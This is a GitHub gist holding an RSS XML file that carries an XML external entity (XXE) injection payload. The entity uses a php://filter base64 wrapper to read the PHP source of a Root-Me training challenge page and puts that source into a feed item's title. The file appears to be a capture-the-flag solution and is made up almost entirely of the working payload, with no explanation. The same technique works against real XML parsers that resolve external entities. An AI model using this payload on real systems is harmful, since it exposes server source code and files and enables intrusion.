Skip to content

Instantly share code, notes, and snippets.

@sbnsec
Created December 19, 2019 16:24
Show Gist options
  • Save sbnsec/cb01911e8eb07a01a132e080ff48e9d1 to your computer and use it in GitHub Desktop.
Save sbnsec/cb01911e8eb07a01a132e080ff48e9d1 to your computer and use it in GitHub Desktop.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE rss [
<!ELEMENT title ANY>
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://challenge01.root-me.org/web-serveur/ch29/index.php" >
]>
<rss version="1.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>bb</title>
<link>http://127.0.0.1</link>
<description>A</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>
<title>&xxe;</title>
<link>http://127.0.0.1</link>
<description>a</description>
<author>am</author>
<pubDate>Mon, 03 Feb 2019 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment